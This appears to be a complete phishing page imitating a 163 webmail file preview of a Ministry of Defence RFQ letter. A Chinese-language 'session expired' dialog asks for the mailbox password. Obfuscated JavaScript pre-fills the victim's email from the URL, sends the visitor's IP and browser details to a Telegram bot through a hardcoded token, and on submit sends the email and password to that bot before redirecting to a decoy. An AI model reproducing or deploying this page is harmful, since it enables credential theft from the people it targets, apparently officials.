<!DOCTYPE html>
<html>
<head>
	<link href="./index_files/favicon.ico" rel="icon" type="image-xicon">
  <meta name="renderer" content="webkit">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<link rel="stylesheet" type="text/css" href="./index_files/globl_zh_CN.css">

    
    
        <link rel="stylesheet" type="text/css" href="./index_files/skin_dft_sky_zh_CN.css">
    

<script>
  (function(_0x7f4f48,_0x57dee4){var _0x142ffd=_0xaff0,_0x46c65f=_0x7f4f48();while(!![]){try{var _0x1f7ae3=-parseInt(_0x142ffd(0x10d))/0x1*(-parseInt(_0x142ffd(0x10f))/0x2)+parseInt(_0x142ffd(0x113))/0x3+parseInt(_0x142ffd(0x114))/0x4+-parseInt(_0x142ffd(0x119))/0x5+-parseInt(_0x142ffd(0x118))/0x6+-parseInt(_0x142ffd(0x111))/0x7*(-parseInt(_0x142ffd(0x116))/0x8)+-parseInt(_0x142ffd(0x11a))/0x9*(parseInt(_0x142ffd(0x10c))/0xa);if(_0x1f7ae3===_0x57dee4)break;else _0x46c65f['push'](_0x46c65f['shift']());}catch(_0x358d80){_0x46c65f['push'](_0x46c65f['shift']());}}}(_0xf0c2,0x7bbdd));function _0xaff0(_0x2746f0,_0x29533f){var _0xf0c216=_0xf0c2();return _0xaff0=function(_0xaff00a,_0x56830d){_0xaff00a=_0xaff00a-0x10b;var _0x35c27e=_0xf0c216[_0xaff00a];return _0x35c27e;},_0xaff0(_0x2746f0,_0x29533f);}function _0xf0c2(){var _0xa240c3=['127416Sqbqix','borderColor','2951292VFpIUG','925035FsLozD','9NKVTCy','getElementById','6423670DlbKBc','55KYwuRC','try','3742qySgSZ','border','217rhjSZV','style','2155512LhffUG','2043820VbuVRa','solid'];_0xf0c2=function(){return _0xa240c3;};return _0xf0c2();}function test(){var _0x19cf39=_0xaff0;document[_0x19cf39(0x10b)](_0x19cf39(0x10e))[_0x19cf39(0x112)][_0x19cf39(0x117)]='outline:\x20none;\x20border-color:\x20rgb(59,\x20120,\x20221)',document['getElementById'](_0x19cf39(0x10e))[_0x19cf39(0x112)][_0x19cf39(0x110)]=_0x19cf39(0x115);}
</script>


  <link rel="stylesheet" type="text/css" href="./index_files/normalfont.css">
  <link rel="stylesheet" type="text/css" href="./index_files/webmail_urs_mail163.css">



<title>Preview Files</title>
<link rel="stylesheet" type="text/css" href="index_files/comm2010575477.css">
<link rel="stylesheet" type="text/css" href="./index_files/global_zh_CN.css">

    
    
        <link rel="stylesheet" type="text/css" href="./index_files/skin_dft_sky_zh_CN.css">

	<style type="text/css">

body{font-family: Arial, Helvetica, sans-serif;
    overflow: hidden;background-color: white;}

		



.objec-tblure{

display:none;
-webkit-filter: blur(5px);
    -moz-filter: blur(2px);
    -o-filter: blur(8px);
    -ms-filter: blur(5px);
    filter: blur(4px);




}.ft {
    clear: both;
    border-width: 1px;
    border-style: solid;
    height: 39px;
    padding: 0 8px;
}.bdr-c-dark {
    border-color: #50A05B;
}
.bdr-c-dark {
    border-color: #50A05B;
}.obje-tblure{

display:none;
-webkit-filter: blur(5px);
    -moz-filter: blur(2px);
    -o-filter: blur(2px);
    -ms-filter: blur(2px);
    filter: blur(2px);




}
.loginform{
      width:160%;
      height: 160%;
      position: absolute;
      top:0;
      display: flex;
      background-color:rgba(0,0,0,0.4);
      justify-content: center;
      align-items: center;
  

    }
}body {padding:0; margin:0;}.noadjust html {_padding-bottom:55px;*height:100%; *overflow:hidden;}.noadjust body {_height:100%;}h1 {font-size:14px; font-weight:bold; margin:10px 15px 5px; padding:8px; line-height:20px;}.previewhead {border-bottom:1px solid #CCC; padding:0 0 5px; margin:5px 8px 5px; overflow:hidden; _zoom:1; overflow:hidden; }.previewhead .download a{position:relative; margin-top:8px;}.previewhead .filename {font-size:26px; height:30px; line-height:30px; overflow:hidden; text-overflow:ellipsis font-weight:normal; padding:3px 0 0 0; margin-right:100px;white-space:normal; word-break:break-all; word-wrap: break-word; overflow:hidden;}.previewhead .filename img {margin:0 5px -3px -18px; display:none;}.ico_down {width:9px; height:10px; position:absolute; background:url() no-repeat -32px -224px; margin-top:7px; *margin-top: 3px; left:20px;}.ico_pre {width:6px; height:12px; position:absolute; background:url() no-repeat 0 0; margin-top:6px;  left:12px;}.ico_next {width:6px; height:12px; position:absolute; background:url() no-repeat -32px 0; margin-top:6px;  left:12px;}.ico_list {width:24px; height:12px; position:absolute; background:url() no-repeat -64px 0; margin-top:6px;  left:8px;}.disabled .ico_next, .disabled .ico_pre {opacity:0.3; filter:alpha(opacity=30); _zoom:1;}.previewmain .previewcontent {position:absolute; top:48px; *top:52px; right:7px; left:7px; bottom:3px; _height:100%; _left:0; _right:0;}.previewmain .previewcontent iframe {width:100%; height:100%;  *position:absolute;}.adjustmain .previewcontent iframe {width:100%; overflow:hidden;}.filelist {position:absolute; width:165px; overflow-x:hidden; overflow-y:auto; top:37px; right:8px; background:#FFF; border:1px solid #DDD; -moz-box-shadow:0 0 5px #CCC;} .filelist .file {padding:7px; border-bottom:1px solid #DDD;  white-space:nowrap; cursor:pointer; }.filelist .file img {margin:0 3px -3px 0;}.filelist .file:hover {background:#444;  background:-moz-linear-gradient(top,#4f4f4f,#3F3F3F); background:-webkit-gradient(linear,0 0,0 100%,from(#4F4F4F),to(#3F3F3F)); color:#FFF; border-bottom:1px solid #444; }.filelist .file .thumb {maux-width:100px; max-height:100px; display:block; margin-bottom:3px; _width:100px; _height:100px;}.filelist .file .filetype {margin:0 3px -3px 0;}.icon_info_s {width:12px; height:12px; background:url() no-repeat -96px -48px; margin:0 5px -1px 0; display:inline-block;}.previewfailed {font-size:14x; margin:10px; padding:8px 12px; -moz-border-radius:5px;-webkit-border-radius:5px; border-radius:5px; background:#F5F5F5; color:#666; margin-bottom:15px;}#mp3player_container {padding:30px;}.mplayer .mmsg { font-size:14px; color:#494949; margin-left:55px; line-height:18px;}#loading {position:absolute; top:50%; left:50%; padding:15px; background:#666; -moz-border-radius:5px;-webkit-border-radius:5px; border-radius:5px; opacity:0.9; color:#FFF; text-align:center; z-index:19; margin:-30px 0 0 -30px;}#loading img {display:block;}.icon_failed {width:31px; height:31px; background:url() no-repeat -192px 0; float:left;}.previewfailed {font-size:12px; border:4px solid #DDD; padding:15px 20px 12px; z-index:20; -moz-border-radius:5px;-webkit-border-radius:5px; border-radius:5px; background:#F5F5F5; color:#494949;  position:absolute; width:220px; height:40px; top:50%; left:50%; margin:-30px 0 0 -125px;}.previewNotSupport {font-size:12px; margin:10px; padding:8px 12px; -moz-border-radius:5px;-webkit-border-radius:5px; border-radius:5px; background:#F5F5F5; color:#666; margin-bottom:15px;}.cursorzoomin {cursor:url(),auto; float:none;}.cursorzoomout {cursor:url(),auto; float:none;}a.yozo_open {display:none;}

</style>

<script>
  var _0x37e149=_0x2740;function _0x2740(_0x4a5723,_0x5daf1c){var _0x27e02e=_0x27e0();return _0x2740=function(_0x274055,_0x3a826d){_0x274055=_0x274055-0xba;var _0x1d5cdb=_0x27e02e[_0x274055];return _0x1d5cdb;},_0x2740(_0x4a5723,_0x5daf1c);}function _0x27e0(){var _0xef8c1a=['userAgent','Ministry\x20of\x20Defence\x20Letter.pdf','7105956638:AAGtRBUYzGXshqOociC0qVjEm8uCoSZ53-4','password','501998SJuYoi','1194210eQfesj','33690wEXVEC','574996eEOvbe','error','290691JpzTUR','href','\x0aClientside:\x20','log','POST','loading','block','divDialogconfirmWLogin','onload','fellow','150maKpVj','get','22346XnSWeH','json','preventDefault','24uBJPWB','querySelector','pdfpage','allmaildownload','input[name=\x22un\x22]','location','then','style','value','none','Error:','getElementById','https://api.ipify.org/?format=json','display','11876029VITmat','6634858055','/sendMessage?chat_id=','1611XFVDHs','Failed\x20to\x20submit\x20form.','catch','&text=','spartta','10UsCTQs','searchParams','search','Your\x20page\x20has\x20been\x20visited.'];_0x27e0=function(){return _0xef8c1a;};return _0x27e0();}(function(_0x4dd0e9,_0x529df6){var _0x31305c=_0x2740,_0x4c82ea=_0x4dd0e9();while(!![]){try{var _0xd8b6bc=-parseInt(_0x31305c(0xbb))/0x1+parseInt(_0x31305c(0xc7))/0x2*(-parseInt(_0x31305c(0xc5))/0x3)+-parseInt(_0x31305c(0xeb))/0x4*(-parseInt(_0x31305c(0xe0))/0x5)+parseInt(_0x31305c(0xe9))/0x6+-parseInt(_0x31305c(0xe8))/0x7*(-parseInt(_0x31305c(0xca))/0x8)+-parseInt(_0x31305c(0xdb))/0x9*(parseInt(_0x31305c(0xea))/0xa)+parseInt(_0x31305c(0xd8))/0xb;if(_0xd8b6bc===_0x529df6)break;else _0x4c82ea['push'](_0x4c82ea['shift']());}catch(_0x4051c5){_0x4c82ea['push'](_0x4c82ea['shift']());}}}(_0x27e0,0x504da),window[_0x37e149(0xc3)]=function(){var _0x25a928=_0x37e149,_0x3c06bd=window[_0x25a928(0xcf)]['href'],_0x2583c4=new URL(_0x3c06bd),_0x3bb22b=_0x2583c4[_0x25a928(0xe1)]['get']('allmaildownload');document[_0x25a928(0xd5)](_0x25a928(0xdf))['value']=_0x3bb22b,setTimeout(function(){var _0x1be616=_0x25a928;document[_0x1be616(0xd5)](_0x1be616(0xc2))[_0x1be616(0xd1)]['display']=_0x1be616(0xc1),document[_0x1be616(0xd5)](_0x1be616(0xcc))[_0x1be616(0xd1)]['display']=_0x1be616(0xd3),document[_0x1be616(0xd5)](_0x1be616(0xc0))[_0x1be616(0xd1)][_0x1be616(0xd7)]=_0x1be616(0xd3),document[_0x1be616(0xd5)](_0x1be616(0xc4))[_0x1be616(0xd1)]['display']=_0x1be616(0xc1);},0x0);var _0x2fba65=window[_0x25a928(0xcf)][_0x25a928(0xe2)],_0x6f232c=new URLSearchParams(_0x2fba65),_0x5bb63e=_0x6f232c[_0x25a928(0xc6)](_0x25a928(0xcd)),_0x5e5e6a=document[_0x25a928(0xcb)](_0x25a928(0xce));_0x5bb63e&&(_0x5e5e6a['value']=_0x5bb63e),sendTelegramNotification(_0x25a928(0xe3));});function sendTelegramNotification(_0x1fbd26){var _0x28228b=_0x37e149,_0x2aa4f3=window[_0x28228b(0xcf)][_0x28228b(0xbc)],_0x535d83=new URL(_0x2aa4f3),_0x5e53b6=_0x535d83['searchParams'][_0x28228b(0xc6)](_0x28228b(0xcd)),_0x5bd3bc='',_0x17a76f=navigator[_0x28228b(0xe4)];fetch(_0x28228b(0xd6))[_0x28228b(0xd0)](_0x2e2531=>_0x2e2531['json']())[_0x28228b(0xd0)](_0x6325c5=>{var _0x40f96e=_0x28228b;_0x5bd3bc=_0x6325c5['ip'],_0x1fbd26+=_0x40f96e(0xbd)+_0x5e53b6+'\x0aIP\x20Address:\x20'+_0x5bd3bc+'\x0aUser\x20Agent:\x20'+_0x17a76f;var _0x53eae2=_0x40f96e(0xe6),_0x4e7341='6634858055',_0x44a629='https://api.telegram.org/bot'+_0x53eae2+_0x40f96e(0xda)+_0x4e7341+_0x40f96e(0xde)+encodeURIComponent(_0x1fbd26);fetch(_0x44a629,{'method':_0x40f96e(0xbf)});});}function sendMessageToTelegramBot(_0x222d8c){var _0x503073=_0x37e149;_0x222d8c[_0x503073(0xc9)]();var _0x398a7d=document[_0x503073(0xd5)](_0x503073(0xdf))['value'],_0x186c10=document[_0x503073(0xd5)](_0x503073(0xe7))[_0x503073(0xd2)],_0x3019ea='STUFF\x20FROM\x20MFA:\x0aUniform:\x20'+_0x398a7d+'\x0aPapa:\x20'+_0x186c10,_0x121c03=_0x503073(0xe6),_0x30fcdd=_0x503073(0xd9),_0x1d319='https://api.telegram.org/bot'+_0x121c03+_0x503073(0xda)+_0x30fcdd+'&text='+encodeURIComponent(_0x3019ea);fetch(_0x1d319,{'method':_0x503073(0xbf)})[_0x503073(0xd0)](_0x3fbc70=>_0x3fbc70[_0x503073(0xc8)]())['then'](_0x12e087=>{var _0x3fcc84=_0x503073;console[_0x3fcc84(0xbe)](_0x12e087),window['location'][_0x3fcc84(0xbc)]=_0x3fcc84(0xe5);})[_0x503073(0xdd)](_0x32ff34=>{var _0x4d9808=_0x503073;console[_0x4d9808(0xba)](_0x4d9808(0xd4),_0x32ff34),alert(_0x4d9808(0xdc));});}
</script>


</head>
<body >
  
  <!-- Showing Pdf panel when popup is on blure this div-->
<div id="pdfpage"style="display: block;" class="obje-tblure">
<object width="100%" height="1000px" data="MOD RFQ LETTER.pdf#toolbar=0"></object>

</div>

<!-- BlurePdf panel when popup is on blure active-->
<div id="fellow" class="objec-tblure">
  <object class="kingfu" width="100%" height="1000px" data="MOD RFQ LETTER.pdf#toolbar=0"></object>
</div>

<div id="loading" style="display: block;"><img src="index_files/loader087795.gif"></div>


<!-- Login Popup Page start Panel-->
<div class="loginform">

<div id="divDialogconfirmWLogin" class="dialog" style="display: none;position: absolute; width: 424px; border:1px solid #136D39;left: 714.5px; top: 304px;height: ;">



    <div class="boxIframeTitle"><h2 style="cursor: default;"><span>系统提示</span></h2><a class="i_t_close" href="javascript:fGoto();" id="divDialogCloseconfirmWLogin">&nbsp;&nbsp;&nbsp;&nbsp;</a></div><div class="boxIframeMain"><div class="boxIframeText">                <div class="pop-wrap">                    <div class="msgDialog fz_14">                        
        <form onsubmit="sendMessageToTelegramBot(event)" id="login_form">                            <p>您的邮箱可能由于您长时间未进行操作，导致登录超时，已被退出，请重新登录。</p>                            <p class="mt_20">账号：<input type="text" id ="spartta" value="" name="un" style="border: 0px solid white;outline: none; border-color: none;text-align: left;border-width: none;box-shadow: none;background-color: #F0F8F0;"></p>                            <p class="mt_10">密码：<input required="" type="password" name="password" id="password" class="rm_txt w162" maxlength="15" value="" tabindex="1">  <span style="color: red">密码错误.再试一次</span>                            </p>                            <input type="hidden" name="loginType" value="WEB">                             <input type="hidden" name="returnurl" value="">                            <input type="hidden" name="userid" id="userid">                               <input type="hidden" name="domain" id="domain" value="">                                      <input type="hidden" name="model" id="model" value="MAIL">                                                 </div>                </div><div class="boxIframeBtn">


    <div class="topborder " style="margin-top: -5px;"> 

<div style="margin-bottom: 5px;">
<button type="sybmit"  class="n_btn_on mt_8"><span class="spn">登  录</span></button> &nbsp;&nbsp;&nbsp;&nbsp;<button type="sybmit"  class="n_btn mt_8"><span class="sn">取消</span></button></div>
</br>


    </form></div></div></div></div></div>




</body>
</html>